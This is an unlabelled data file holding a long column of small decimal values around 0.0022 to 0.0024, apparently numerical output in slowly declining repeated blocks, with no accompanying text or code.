0.00239943
0.00239937
0.00239532
0.00240497
0.00240908
0.00240902
0.00240461
0.00240902
0.00240469
0.00240478
0.00239935
0.00239945
0.00239538
0.0023951
0.00239937
0.00239944
0.00239536
0.00240479
0.00240529
0.00240891
0.00240891
0.002409
0.00240497
0.00240497
0.00238009
0.00237988
0.00237607
0.00237607
0.00237589
0.00238
0.00238
0.00236628
0.00236678
0.00237038
0.00237039
0.00237048
0.00236646
0.00236646
0.00238009
0.00238019
0.00237585
0.00237613
0.00238018
0.00238011
0.00237611
0.00238569
0.00238973
0.0023898
0.00238533
0.00238542
0.00238973
0.0023855
0.00238573
0.0023855
0.00238981
0.00238974
0.00238547
0.00238972
0.00238575
0.0023801
0.00237579
0.00238017
0.00237588
0.00238018
0.0023801
0.00237607
0.00238009
0.00238019
0.00237585
0.00237613
0.00238018
0.00238011
0.00237611
0.00238569
0.00238973
0.0023898
0.00238533
0.00238973
0.00238542
0.0023855
0.00238573
0.0023855
0.00238981
0.00238974
0.00238972
0.00238547
0.00238575
0.0023801
0.00237579
0.00238017
0.00237588
0.00238018
0.00237607
0.0023801
0.0023665
0.00237057
0.0023705
0.00236627
0.00237048
0.00236623
0.00236652
0.00236089
0.00235667
0.00236096
0.00235659
0.00236089
0.00236096
0.00235686
0.00236646
0.00237056
0.00237049
0.0023661
0.00236627
0.00237049
0.00236618
0.00236087
0.00236098
0.00235664
0.00235692
0.00236096
0.00236089
0.0023569
0.0023665
0.00237057
0.0023705
0.00236627
0.00237048
0.00236623
0.00236652
0.00236089
0.00235667
0.00236096
0.00235659
0.00236096
0.00236089
0.00235686
0.00236646
0.00237056
0.00237049
0.0023661
0.00237049
0.00236618
0.00236627
0.00236087
0.00236098
0.00235664
0.00235692
0.00236096
0.00236089
0.0023569
0.00238009
0.00237988
0.00237607
0.00237607
0.00238
0.00238
0.00237589
0.00236628
0.00236678
0.00237039
0.00237039
0.00236646
0.00237048
0.00236646
0.00238009
0.00238019
0.00237585
0.00237613
0.00238018
0.00238011
0.00237611
0.00238569
0.00238973
0.0023898
0.00238533
0.00238542
0.00238973
0.0023855
0.00238573
0.0023855
0.0023898
0.00238974
0.00238547
0.00238972
0.00238575
0.0023801
0.00237579
0.00238017
0.00237588
0.00238017
0.0023801
0.00237607
0.00238009
0.00238019
0.00237613
0.00237585
0.00238011
0.00238018
0.00237611
0.00238569
0.00238973
0.0023898
0.00238533
0.00238973
0.00238542
0.0023855
0.00238573
0.0023855
0.00238974
0.00238981
0.00238972
0.00238575
0.00238547
0.0023801
0.00237579
0.00238017
0.00237588
0.00238017
0.00237607
0.0023801
0.0023665
0.00237057
0.0023705
0.00236627
0.00237048
0.00236623
0.00236652
0.00236089
0.00235667
0.00236096
0.00235659
0.00236089
0.00236096
0.00235687
0.00236646
0.00237056
0.00237049
0.0023661
0.00236627
0.00237049
0.00236619
0.00236087
0.00236098
0.00235664
0.00235692
0.00236096
0.00236089
0.0023569
0.0023665
0.0023705
0.00237056
0.00236627
0.00237048
0.00236652
0.00236623
0.00236089
0.00235667
0.00236096
0.00235659
0.00236096
0.00236089
0.00235687
0.00236646
0.00237056
0.00237049
0.0023661
0.00237049
0.00236618
0.00236627
0.00236087
0.00236098
0.00235692
0.00235664
0.00236089
0.00236096
0.0023569
0.00238009
0.00238019
0.00237613
0.00237584
0.00238011
0.00238018
0.00237611
0.00238569
0.00238973
0.0023898
0.00238533
0.0023855
0.00238973
0.00238542
0.00238573
0.0023855
0.00238974
0.0023898
0.00238575
0.00238972
0.00238547
0.0023801
0.00237579
0.00238017
0.00237588
0.0023801
0.00238017
0.00237607
0.0023665
0.00237057
0.0023705
0.00236627
0.00237047
0.00236623
0.00236652
0.00236089
0.00235667
0.00236096
0.00235659
0.00235686
0.00236089
0.00236096
0.00236646
0.00237056
0.00237049
0.0023661
0.00237049
0.00236627
0.00236618
0.00236087
0.00236098
0.00235663
0.00235692
0.0023569
0.00236096
0.00236089
0.0023665
0.0023705
0.00237057
0.00236626
0.00237048
0.00236652
0.00236623
0.00236088
0.00235667
0.00236096
0.00235659
0.00236096
0.00236089
0.00235686
0.00236646
0.00237056
0.00237049
0.0023661
0.00237049
0.00236618
0.00236627
0.00236087
0.00236098
0.00235692
0.00235663
0.00236089
0.00236096
0.0023569
0.00238009
0.00237988
0.00237607
0.00237607
0.00238
0.00238
0.00237589
0.00236628
0.00236678
0.00237038
0.00237038
0.00236646
0.00237048
0.00236646
0.00238009
0.00238019
0.00237613
0.00237584
0.00238011
0.00238018
0.00237611
0.00238569
0.00238973
0.0023898
0.00238533
0.0023855
0.00238973
0.00238541
0.00238573
0.0023855
0.00238974
0.0023898
0.00238575
0.00238972
0.00238547
0.0023801
0.00237579
0.00238017
0.00237588
0.0023801
0.00238017
0.00237607
0.0023665
0.0023705
0.00237056
0.00236626
0.00237048
0.00236652
0.00236623
0.00236088
0.00235667
0.00236096
0.00235659
0.00235686
0.00236089
0.00236096
0.00236646
0.00237056
0.00237049
0.0023661
0.00237049
0.00236627
0.00236618
0.00236087
0.00236098
0.00235692
0.00235663
0.0023569
0.00236089
0.00236096
0.0023665
0.0023705
0.00237056
0.00236627
0.00237048
0.00236652
0.00236623
0.00236088
0.00235667
0.00236096
0.00235659
0.00236096
0.00236089
0.00235686
0.00236646
0.00237056
0.00237049
0.0023661
0.00237049
0.00236618
0.00236627
0.00236087
0.00236098
0.00235692
0.00235663
0.00236089
0.00236096
0.0023569
0.00236628
0.00236678
0.00237038
0.00237039
0.00237048
0.00236646
0.00236646
0.00234171
0.00234149
0.0023377
0.0023377
0.00233752
0.00234161
0.00234162
0.00232795
0.00232846
0.00233205
0.00233205
0.00233215
0.00232814
0.00232814
0.0023417
0.00234181
0.00233747
0.00233776
0.00234179
0.00234172
0.00233774
0.00234728
0.0023513
0.00235137
0.00234692
0.002347
0.00235129
0.00234708
0.00234731
0.00234708
0.00235137
0.0023513
0.00234705
0.00235128
0.00234734
0.00234171
0.00233743
0.00234179
0.00233751
0.00234179
0.00234172
0.0023377
0.0023417
0.00234181
0.00233747
0.00233776
0.00234179
0.00234172
0.00233774
0.00234728
0.0023513
0.00235137
0.00234692
0.00235129
0.002347
0.00234709
0.00234731
0.00234708
0.00235137
0.0023513
0.00235128
0.00234705
0.00234734
0.00234171
0.00233743
0.00234179
0.00233751
0.00234179
0.0023377
0.00234172
0.00232818
0.00233223
0.00233215
0.00232794
0.00233213
0.00232791
0.0023282
0.00232259
0.00231839
0.00232267
0.00231831
0.00232259
0.00232267
0.00231859
0.00232814
0.00233223
0.00233215
0.00232778
0.00232795
0.00233215
0.00232786
0.00232258
0.00232268
0.00231835
0.00231865
0.00232267
0.0023226
0.00231862
0.00232818
0.00233223
0.00233215
0.00232794
0.00233213
0.00232791
0.0023282
0.00232259
0.0023184
0.00232267
0.00231831
0.00232267
0.00232259
0.00231859
0.00232814
0.00233223
0.00233215
0.00232778
0.00233215
0.00232786
0.00232795
0.00232257
0.00232268
0.00231835
0.00231865
0.00232267
0.0023226
0.00231862
0.00234171
0.00234149
0.0023377
0.0023377
0.00234161
0.00234161
0.00233752
0.00232795
0.00232846
0.00233205
0.00233205
0.00232814
0.00233215
0.00232814
0.0023417
0.00234181
0.00233747
0.00233776
0.00234179
0.00234172
0.00233774
0.00234728
0.0023513
0.00235137
0.00234692
0.002347
0.00235129
0.00234709
0.00234731
0.00234708
0.00235137
0.0023513
0.00234705
0.00235128
0.00234734
0.00234171
0.00233743
0.0023418
0.00233751
0.0023418
0.00234172
0.0023377
0.0023417
0.00234181
0.00233776
0.00233747
0.00234172
0.0023418
0.00233774
0.00234728
0.0023513
0.00235137
0.00234692
0.00235129
0.002347
0.00234709
0.00234731
0.00234708
0.0023513
0.00235138
0.00235128
0.00234734
0.00234705
0.00234171
0.00233743
0.00234179
0.00233751
0.00234179
0.0023377
0.00234172
0.00232818
0.00233223
0.00233215
0.00232794
0.00233213
0.00232791
0.0023282
0.00232259
0.0023184
0.00232267
0.00231831
0.00232259
0.00232267
0.00231859
0.00232814
0.00233223
0.00233215
0.00232778
0.00232795
0.00233215
0.00232786
0.00232258
0.00232268
0.00231835
0.00231865
0.00232267
0.0023226
0.00231862
0.00232818
0.00233215
0.00233223
0.00232794
0.00233213
0.0023282
0.00232791
0.00232259
0.0023184
0.00232267
0.00231831
0.00232267
0.00232259
0.00231859
0.00232814
0.00233223
0.00233215
0.00232778
0.00233215
0.00232786
0.00232795
0.00232258
0.00232268
0.00231865
0.00231835
0.0023226
0.00232267
0.00231862
0.0023417
0.00234181
0.00233776
0.00233747
0.00234172
0.00234179
0.00233774
0.00234728
0.0023513
0.00235137
0.00234692
0.00234708
0.00235129
0.002347
0.00234731
0.00234708
0.0023513
0.00235137
0.00234734
0.00235128
0.00234705
0.00234171
0.00233742
0.00234179
0.00233751
0.00234172
0.00234179
0.0023377
0.00232818
0.00233223
0.00233215
0.00232794
0.00233213
0.00232791
0.0023282
0.00232259
0.0023184
0.00232267
0.00231831
0.00231859
0.00232259
0.00232267
0.00232814
0.00233222
0.00233215
0.00232778
0.00233214
0.00232795
0.00232786
0.00232257
0.00232268
0.00231835
0.00231865
0.00231862
0.00232267
0.0023226
0.00232818
0.00233215
0.00233223
0.00232794
0.00233213
0.0023282
0.00232791
0.00232259
0.0023184
0.00232267
0.00231831
0.00232267
0.00232259
0.00231859
0.00232814
0.00233223
0.00233215
0.00232778
0.00233214
0.00232786
0.00232795
0.00232258
0.00232268
0.00231865
0.00231835
0.0023226
0.00232267
0.00231862
0.00234171
0.00234149
0.0023377
0.0023377
0.00234161
0.00234161
0.00233752
0.00232795
0.00232846
0.00233205
0.00233205
0.00232814
0.00233215
0.00232814
0.0023417
0.00234181
0.00233776
0.00233747
0.00234172
0.00234179
0.00233774
0.00234728
0.0023513
0.00235137
0.00234692
0.00234709
0.00235129
0.002347
0.00234731
0.00234708
0.0023513
0.00235137
0.00234734
0.00235128
0.00234705
0.00234171
0.00233742
0.00234179
0.00233751
0.00234172
0.00234179
0.0023377
0.00232818
0.00233215
0.00233223
0.00232794
0.00233213
0.0023282
0.00232791
0.00232259
0.0023184
0.00232267
0.00231831
0.00231859
0.00232259
0.00232267
0.00232814
0.00233223
0.00233215
0.00232778
0.00233215
0.00232795
0.00232786
0.00232257
0.00232268
0.00231865
0.00231835
0.00231862
0.0023226
0.00232267
0.00232818
0.00233215
0.00233222
0.00232794
0.00233213
0.0023282
0.00232791
0.00232259
0.0023184
0.00232267
0.00231831
0.00232267
0.00232259
0.00231859
0.00232814
0.00233223
0.00233215
0.00232778
0.00233214
0.00232786
0.00232795
0.00232257
0.00232268
0.00231865
0.00231835
0.0023226
0.00232267
0.00231862
0.00232795
0.00232846
0.00233205
0.00233205
0.00233215
0.00232814
0.00232814
0.00230351
0.00230329
0.00229951
0.00229951
0.00229933
0.00230341
0.00230341
0.00228981
0.00229032
0.00229389
0.00229389
0.00229399
0.00228999
0.00228999
0.00230349
0.0023036
0.00229928
0.00229958
0.00230359
0.00230351
0.00229955
0.00230905
0.00231305
0.00231313
0.00230869
0.00230877
0.00231304
0.00230885
0.00230908
0.00230884
0.00231313
0.00231305
0.00230881
0.00231303
0.00230911
0.00230351
0.00229924
0.00230359
0.00229932
0.00230359
0.00230351
0.00229951
0.00230349
0.0023036
0.00229928
0.00229958
0.00230359
0.00230351
0.00229955
0.00230905
0.00231305
0.00231313
0.00230869
0.00231304
0.00230877
0.00230885
0.00230908
0.00230884
0.00231312
0.00231305
0.00231303
0.00230881
0.00230911
0.00230351
0.00229924
0.00230359
0.00229932
0.00230359
0.00229951
0.00230351
0.00229003
0.00229407
0.00229399
0.00228979
0.00229397
0.00228976
0.00229005
0.00228447
0.00228029
0.00228456
0.00228021
0.00228447
0.00228456
0.00228048
0.00228999
0.00229407
0.00229399
0.00228964
0.0022898
0.00229398
0.00228972
0.00228445
0.00228456
0.00228025
0.00228054
0.00228455
0.00228447
0.00228052
0.00229003
0.00229407
0.00229399
0.00228979
0.00229397
0.00228976
0.00229005
0.00228447
0.00228029
0.00228456
0.00228021
0.00228456
0.00228447
0.00228048
0.00228999
0.00229407
0.00229399
0.00228964
0.00229398
0.00228972
0.0022898
0.00228445
0.00228456
0.00228025
0.00228054
0.00228455
0.00228447
0.00228052
0.00230351
0.00230329
0.00229951
0.00229951
0.00230341
0.00230341
0.00229933
0.0022898
0.00229032
0.00229389
0.00229389
0.00228999
0.00229399
0.00228999
0.00230349
0.0023036
0.00229928
0.00229957
0.00230359
0.00230352
0.00229955
0.00230905
0.00231305
0.00231313
0.00230869
0.00230877
0.00231304
0.00230886
0.00230908
0.00230884
0.00231312
0.00231305
0.00230881
0.00231303
0.00230911
0.00230351
0.00229924
0.00230359
0.00229932
0.00230359
0.00230351
0.00229951
0.00230349
0.0023036
0.00229957
0.00229928
0.00230352
0.00230359
0.00229955
0.00230905
0.00231305
0.00231313
0.00230869
0.00231304
0.00230877
0.00230886
0.00230908
0.00230884
0.00231305
0.00231313
0.00231303
0.00230911
0.00230881
0.00230351
0.00229924
0.00230359
0.00229932
0.00230359
0.00229951
0.00230351
0.00229003
0.00229407
0.00229399
0.00228979
0.00229397
0.00228976
0.00229005
0.00228447
0.0022803
0.00228456
0.00228021
0.00228447
0.00228456
0.00228048
0.00228999
0.00229407
0.00229399
0.00228964
0.0022898
0.00229398
0.00228972
0.00228445
0.00228457
0.00228025
0.00228054
0.00228456
0.00228447
0.00228052
0.00229003
0.00229399
0.00229407
0.00228979
0.00229397
0.00229005
0.00228976
0.00228447
0.0022803
0.00228456
0.00228021
0.00228456
0.00228447
0.00228048
0.00228999
0.00229407
0.00229399
0.00228964
0.00229398
0.00228972
0.00228981
0.00228445
0.00228456
0.00228054
0.00228025
0.00228447
0.00228455
0.00228052
0.00230349
0.0023036
0.00229957
0.00229928
0.00230351
0.00230359
0.00229955
0.00230905
0.00231305
0.00231313
0.00230869
0.00230885
0.00231304
0.00230877
0.00230908
0.00230884
0.00231305
0.00231312
0.00230911
0.00231303
0.00230881
0.00230351
0.00229923
0.00230359
0.00229932
0.00230351
0.00230359
0.00229951
0.00229003
0.00229407
0.00229399
0.00228979
0.00229397
0.00228976
0.00229005
0.00228447
0.00228029
0.00228456
0.00228021
0.00228048
0.00228447
0.00228456
0.00228999
0.00229407
0.00229399
0.00228964
0.00229398
0.0022898
0.00228972
0.00228445
0.00228456
0.00228025
0.00228054
0.00228052
0.00228455
0.00228447
0.00229003
0.00229399
0.00229407
0.00228979
0.00229397
0.00229005
0.00228976
0.00228447
0.00228029
0.00228456
0.00228021
0.00228455
0.00228447
0.00228048
0.00228999
0.00229407
0.00229399
0.00228964
0.00229398
0.00228972
0.0022898
0.00228445
0.00228456
0.00228054
0.00228025
0.00228447
0.00228455
0.00228052
0.00230351
0.00230329
0.00229951
0.00229951
0.00230341
0.00230341
0.00229933
0.00228981
0.00229032
0.00229389
0.00229389
0.00228999
0.00229399
0.00228999
0.00230349
0.0023036
0.00229957
0.00229928
0.00230351
0.00230359
0.00229955
0.00230905
0.00231305
0.00231313
0.00230869
0.00230886
0.00231304
0.00230877
0.00230908
0.00230884
0.00231305
0.00231312
0.00230911
0.00231303
0.00230881
0.00230351
0.00229924
0.00230359
0.00229932
0.00230351
0.00230359
0.00229951
0.00229003
0.00229399
0.00229407
0.00228979
0.00229397
0.00229005
0.00228976
0.00228447
0.0022803
0.00228456
0.00228021
0.00228048
0.00228447
0.00228456
0.00228999
0.00229407
0.00229399
0.00228964
0.00229398
0.00228981
0.00228972
0.00228445
0.00228456
0.00228054
0.00228025
0.00228052
0.00228447
0.00228455
0.00229003
0.00229399
0.00229407
0.00228979
0.00229397
0.00229005
0.00228976
0.00228447
0.0022803
0.00228456
0.00228021
0.00228456
0.00228447
0.00228048
0.00228999
0.00229407
0.00229399
0.00228964
0.00229398
0.00228971
0.00228981
0.00228445
0.00228456
0.00228054
0.00228025
0.00228447
0.00228455
0.00228052
0.0022898
0.00229032
0.00229389
0.00229389
0.00229399
0.00228999
0.00228999
0.00226548
0.00226525
0.00226149
0.00226149
0.0022613
0.00226538
0.00226538
0.00225182
0.00225234
0.00225589
0.00225589
0.002256
0.00225201
0.00225201
0.00226545
0.00226557
0.00226126
0.00226155
0.00226556
0.00226547
0.00226153
0.00227098
0.00227497
0.00227505
0.00227063
0.00227071
0.00227496
0.00227079
0.00227102
0.00227078
0.00227505
0.00227497
0.00227075
0.00227495
0.00227104
0.00226547
0.00226122
0.00226556
0.0022613
0.00226556
0.00226547
0.00226149
0.00226545
0.00226557
0.00226126
0.00226155
0.00226556
0.00226547
0.00226153
0.00227098
0.00227497
0.00227505
0.00227063
0.00227496
0.0022707
0.00227079
0.00227102
0.00227078
0.00227505
0.00227497
0.00227495
0.00227075
0.00227104
0.00226547
0.00226122
0.00226556
0.0022613
0.00226556
0.00226149
0.00226547
0.00225205
0.00225607
0.00225599
0.0022518
0.00225597
0.00225178
0.00225207
0.00224651
0.00224235
0.00224661
0.00224226
0.00224652
0.00224661
0.00224254
0.00225201
0.00225608
0.00225599
0.00225166
0.00225182
0.00225598
0.00225174
0.00224649
0.00224661
0.00224231
0.0022426
0.0022466
0.00224651
0.00224258
0.00225205
0.00225607
0.00225599
0.0022518
0.00225597
0.00225178
0.00225207
0.00224651
0.00224235
0.00224661
0.00224226
0.00224661
0.00224652
0.00224254
0.00225201
0.00225608
0.00225599
0.00225166
0.00225598
0.00225174
0.00225182
0.00224649
0.00224661
0.00224231
0.0022426
0.0022466
0.00224651
0.00224258
0.00226548
0.00226525
0.00226149
0.00226149
0.00226538
0.00226538
0.0022613
0.00225182
0.00225234
0.00225589
0.00225589
0.00225201
0.002256
0.00225201
0.00226545
0.00226557
0.00226126
0.00226155
0.00226556
0.00226548
0.00226153
0.00227098
0.00227497
0.00227505
0.00227063
0.00227071
0.00227496
0.0022708
0.00227102
0.00227078
0.00227505
0.00227497
0.00227075
0.00227495
0.00227104
0.00226547
0.00226122
0.00226556
0.00226131
0.00226556
0.00226547
0.00226149
0.00226545
0.00226557
0.00226155
0.00226126
0.00226547
0.00226556
0.00226153
0.00227098
0.00227497
0.00227505
0.00227063
0.00227496
0.00227071
0.00227079
0.00227102
0.00227078
0.00227497
0.00227505
0.00227495
0.00227104
0.00227075
0.00226547
0.00226122
0.00226556
0.00226131
0.00226556
0.00226149
0.00226547
0.00225205
0.00225607
0.00225599
0.0022518
0.00225597
0.00225178
0.00225207
0.00224651
0.00224235
0.00224661
0.00224227
0.00224651
0.0022466
0.00224254
0.00225201
0.00225608
0.00225599
0.00225166
0.00225182
0.00225598
0.00225173
0.00224649
0.00224661
0.00224231
0.0022426
0.0022466
0.00224651
0.00224258
0.00225205
0.00225599
0.00225607
0.0022518
0.00225597
0.00225207
0.00225178
0.00224651
0.00224235
0.00224661
0.00224226
0.0022466
0.00224651
0.00224254
0.00225201
0.00225608
0.00225599
0.00225166
0.00225598
0.00225174
0.00225182
0.00224649
0.00224661
0.0022426
0.00224231
0.00224651
0.0022466
0.00224258
0.00226545
0.00226557
0.00226155
0.00226126
0.00226547
0.00226556
0.00226153
0.00227098
0.00227497
0.00227505
0.00227063
0.00227079
0.00227496
0.00227071
0.00227102
0.00227078
0.00227497
0.00227505
0.00227104
0.00227495
0.00227075
0.00226547
0.00226121
0.00226556
0.0022613
0.00226547
0.00226556
0.00226149
0.00225205
0.00225607
0.00225599
0.0022518
0.00225597
0.00225178
0.00225207
0.00224651
0.00224235
0.00224661
0.00224227
0.00224254
0.00224652
0.0022466
0.00225201
0.00225608
0.00225599
0.00225166
0.00225598
0.00225182
0.00225174
0.00224649
0.00224661
0.00224231
0.0022426
0.00224258
0.0022466
0.00224651
0.00225205
0.00225599
0.00225607
0.0022518
0.00225597
0.00225207
0.00225178
0.00224651
0.00224235
0.00224661
0.00224227
0.0022466
0.00224652
0.00224254
0.00225201
0.00225608
0.00225599
0.00225166
0.00225598
0.00225173
0.00225182
0.00224649
0.00224661
0.0022426
0.00224231
0.00224651
0.0022466
0.00224258
0.00226548
0.00226525
0.00226149
0.00226149
0.00226538
0.00226538
0.0022613
0.00225182
0.00225234
0.00225589
0.00225589
0.00225201
0.002256
0.00225201
0.00226545
0.00226557
0.00226155
0.00226126
0.00226547
0.00226556
0.00226153
0.00227098
0.00227497
0.00227505
0.00227063
0.0022708
0.00227496
0.0022707
0.00227102
0.00227078
0.00227497
0.00227505
0.00227104
0.00227495
0.00227075
0.00226547
0.00226121
0.00226556
0.00226131
0.00226547
0.00226556
0.00226149
0.00225205
0.00225599
0.00225607
0.0022518
0.00225597
0.00225207
0.00225178
0.00224651
0.00224235
0.00224661
0.00224227
0.00224254
0.00224651
0.0022466
0.00225201
0.00225608
0.00225599
0.00225166
0.00225598
0.00225182
0.00225173
0.00224649
0.00224661
0.0022426
0.00224231
0.00224258
0.00224651
0.0022466
0.00225205
0.00225599
0.00225607
0.0022518
0.00225597
0.00225207
0.00225178
0.00224651
0.00224235
0.00224661
0.00224226
0.0022466
0.00224651
0.00224254
0.00225201
0.00225608
0.00225599
0.00225166
0.00225598
0.00225174
0.00225183
0.00224649
0.00224661
0.0022426
0.0022423
0.00224651
0.0022466
0.00224258
0.00225182
0.00225234
0.00225589
0.0022559
0.002256
0.00225201
0.00225201
0.00222761
0.00222736
0.00222362
0.00222362
0.00222344
0.0022275
0.0022275
0.00221399
0.00221451
0.00221805
0.00221805
0.00221816
0.00221418
0.00221418
0.00222757
0.00222769
0.00222339
0.00222368
0.00222768
0.00222759
0.00222366
0.00223308
0.00223705
0.00223714
0.00223273
0.0022328
0.00223704
0.00223289
0.00223311
0.00223287
0.00223714
0.00223705
0.00223284
0.00223702
0.00223314
0.00222758
0.00222335
0.00222769
0.00222344
0.00222768
0.00222759
0.00222362
0.00222757
0.00222769
0.00222339
0.00222368
0.00222768
0.00222759
0.00222366
0.00223308
0.00223705
0.00223714
0.00223273
0.00223704
0.0022328
0.00223289
0.00223311
0.00223287
0.00223714
0.00223705
0.00223702
0.00223284
0.00223314
0.00222758
0.00222335
0.00222769
0.00222344
0.00222768
0.00222362
0.00222759
0.00221422
0.00221823
0.00221814
0.00221397
0.00221812
0.00221394
0.00221424
0.00220869
0.00220456
0.0022088
0.00220447
0.00220871
0.0022088
0.00220474
0.00221418
0.00221824
0.00221814
0.00221383
0.00221399
0.00221813
0.0022139
0.00220867
0.0022088
0.00220451
0.0022048
0.0022088
0.0022087
0.00220478
0.00221422
0.00221823
0.00221814
0.00221397
0.00221812
0.00221395
0.00221424
0.00220869
0.00220456
0.00220881
0.00220447
0.0022088
0.00220871
0.00220474
0.00221418
0.00221824
0.00221814
0.00221383
0.00221813
0.00221391
0.00221399
0.00220867
0.00220881
0.00220451
0.0022048
0.0022088
0.0022087
0.00220478
0.00222761
0.00222736
0.00222362
0.00222362
0.0022275
0.0022275
0.00222344
0.00221399
0.00221451
0.00221805
0.00221805
0.00221418
0.00221816
0.00221418
0.00222757
0.00222769
0.00222339
0.00222368
0.00222768
0.00222759
0.00222366
0.00223308
0.00223705
0.00223714
0.00223273
0.0022328
0.00223704
0.00223289
0.00223311
0.00223287
0.00223714
0.00223705
0.00223284
0.00223702
0.00223314
0.00222758
0.00222335
0.00222769
0.00222344
0.00222769
0.00222759
0.00222363
0.00222757
0.00222769
0.00222368
0.00222339
0.00222759
0.00222768
0.00222366
0.00223308
0.00223705
0.00223714
0.00223273
0.00223704
0.0022328
0.00223289
0.00223311
0.00223287
0.00223705
0.00223713
0.00223702
0.00223314
0.00223284
0.00222758
0.00222335
0.00222769
0.00222344
0.00222768
0.00222363
0.00222759
0.00221422
0.00221823
0.00221814
0.00221397
0.00221812
0.00221395
0.00221424
0.00220869
0.00220456
0.0022088
0.00220447
0.00220871
0.0022088
0.00220474
0.00221418
0.00221824
0.00221814
0.00221383
0.00221399
0.00221813
0.00221391
0.00220867
0.0022088
0.00220451
0.0022048
0.00220879
0.0022087
0.00220478
0.00221422
0.00221814
0.00221823
0.00221397
0.00221812
0.00221424
0.00221395
0.00220869
0.00220456
0.0022088
0.00220447
0.0022088
0.0022087
0.00220474
0.00221418
0.00221824
0.00221814
0.00221383
0.00221813
0.00221391
0.00221399
0.00220868
0.0022088
0.0022048
0.00220451
0.0022087
0.0022088
0.00220478
0.00222757
0.00222769
0.00222368
0.00222339
0.00222759
0.00222768
0.00222366
0.00223308
0.00223705
0.00223714
0.00223273
0.00223289
0.00223704
0.0022328
0.00223311
0.00223287
0.00223705
0.00223714
0.00223314
0.00223702
0.00223284
0.00222758
0.00222335
0.00222769
0.00222344
0.00222759
0.00222768
0.00222362
0.00221422
0.00221823
0.00221814
0.00221397
0.00221812
0.00221395
0.00221424
0.00220869
0.00220456
0.0022088
0.00220447
0.00220474
0.0022087
0.0022088
0.00221418
0.00221824
0.00221814
0.00221383
0.00221813
0.00221399
0.00221391
0.00220867
0.0022088
0.00220451
0.0022048
0.00220478
0.00220879
0.0022087
0.00221422
0.00221814
0.00221823
0.00221397
0.00221812
0.00221424
0.00221395
0.00220869
0.00220456
0.0022088
0.00220447
0.0022088
0.0022087
0.00220474
0.00221418
0.00221824
0.00221814
0.00221383
0.00221813
0.00221391
0.00221399
0.00220868
0.0022088
0.0022048
0.00220451
0.0022087
0.00220879
0.00220478
0.00222761
0.00222736
0.00222362
0.00222362
0.0022275
0.0022275
0.00222344
0.00221399
0.00221451
0.00221805
0.00221805
0.00221418
0.00221816
0.00221418
0.00222757
0.00222769
0.00222368
0.00222339
0.00222759
0.00222768
0.00222366
0.00223308
0.00223705
0.00223714
0.00223273
0.00223289
0.00223704
0.0022328
0.00223311
0.00223287
0.00223705
0.00223713
0.00223314
0.00223702
0.00223284
0.00222758
0.00222335
0.00222769
0.00222344
0.00222759
0.00222768
0.00222362
0.00221422
0.00221814
0.00221823
0.00221397
0.00221812
0.00221424
0.00221395
0.00220869
0.00220456
0.0022088
0.00220447
0.00220474
0.0022087
0.0022088
0.00221418
0.00221824
0.00221814
0.00221383
0.00221813
0.00221399
0.00221391
0.00220868
0.0022088
0.0022048
0.00220451
0.00220478
0.0022087
0.00220879
0.00221422
0.00221814
0.00221823
0.00221397
0.00221812
0.00221424
0.00221395
0.00220869
0.00220456
0.0022088
0.00220447
0.0022088
0.0022087
0.00220474
0.00221418
0.00221824
0.00221814
0.00221383
0.00221813
0.00221391
0.002214
0.00220867
0.0022088
0.0022048
0.00220451
0.0022087
0.00220879
0.00220478
0.00221399
0.00221451
0.00221805
0.00221805
0.00221816
0.00221418
0.00221418
0.00218987
0.00218962
0.00218589
0.00218589
0.0021857
0.00218976
0.00218976
0.00217629
0.00217681
0.00218034
0.00218034
0.00218046
0.00217648
0.00217648
0.00218982
0.00218995
0.00218566
0.00218595
0.00218994
0.00218984
0.00218593
0.00219531
0.00219927
0.00219937
0.00219497
0.00219504
0.00219926
0.00219513
0.00219535
0.00219511
0.00219937
0.00219926
0.00219508
0.00219924
0.00219537
0.00218984
0.00218562
0.00218995
0.00218571
0.00218995
0.00218985
0.00218589
0.00218982
0.00218995
0.00218566
0.00218595
0.00218994
0.00218984
0.00218593
0.00219531
0.00219927
0.00219937
0.00219497
0.00219926
0.00219504
0.00219513
0.00219535
0.00219511
0.00219937
0.00219926
0.00219924
0.00219508
0.00219537
0.00218984
0.00218562
0.00218995
0.00218571
0.00218995
0.00218589
0.00218985
0.00217651
0.00218053
0.00218042
0.00217627
0.0021804
0.00217625
0.00217654
0.00217101
0.00216689
0.00217113
0.0021668
0.00217102
0.00217112
0.00216707
0.00217648
0.00218053
0.00218043
0.00217613
0.00217629
0.00218042
0.00217621
0.00217099
0.00217112
0.00216684
0.00216713
0.00217112
0.00217101
0.00216711
0.00217651
0.00218053
0.00218042
0.00217627
0.0021804
0.00217624
0.00217654
0.00217101
0.00216689
0.00217113
0.0021668
0.00217112
0.00217102
0.00216707
0.00217648
0.00218053
0.00218043
0.00217613
0.00218042
0.00217621
0.00217629
0.00217099
0.00217112
0.00216684
0.00216713
0.00217112
0.00217101
0.00216711
0.00218987
0.00218962
0.00218589
0.00218589
0.00218976
0.00218976
0.0021857
0.00217629
0.00217681
0.00218034
0.00218034
0.00217648
0.00218046
0.00217648
0.00218982
0.00218995
0.00218566
0.00218595
0.00218994
0.00218984
0.00218593
0.00219531
0.00219927
0.00219937
0.00219497
0.00219504
0.00219926
0.00219513
0.00219535
0.00219511
0.00219936
0.00219927
0.00219508
0.00219924
0.00219537
0.00218984
0.00218562
0.00218995
0.00218571
0.00218995
0.00218985
0.00218589
0.00218982
0.00218995
0.00218595
0.00218566
0.00218984
0.00218994
0.00218593
0.00219531
0.00219927
0.00219937
0.00219497
0.00219926
0.00219504
0.00219513
0.00219535
0.00219511
0.00219926
0.00219937
0.00219924
0.00219537
0.00219508
0.00218984
0.00218562
0.00218995
0.00218571
0.00218995
0.00218589
0.00218985
0.00217651
0.00218053
0.00218042
0.00217627
0.0021804
0.00217625
0.00217653
0.00217101
0.00216689
0.00217113
0.0021668
0.00217102
0.00217113
0.00216707
0.00217648
0.00218053
0.00218043
0.00217613
0.0021763
0.00218042
0.00217621
0.00217099
0.00217113
0.00216684
0.00216713
0.00217112
0.00217101
0.0021671
0.00217651
0.00218042
0.00218053
0.00217627
0.0021804
0.00217654
0.00217625
0.00217101
0.00216689
0.00217113
0.0021668
0.00217112
0.00217102
0.00216707
0.00217648
0.00218053
0.00218043
0.00217614
0.00218042
0.00217621
0.0021763
0.00217099
0.00217113
0.00216713
0.00216684
0.00217101
0.00217112
0.00216711
0.00218982
0.00218995
0.00218595
0.00218566
0.00218984
0.00218994
0.00218593
0.00219531
0.00219927
0.00219937
0.00219497
0.00219513
0.00219926
0.00219504
0.00219535
0.00219511
0.00219927
0.00219936
0.00219537
0.00219924
0.00219508
0.00218984
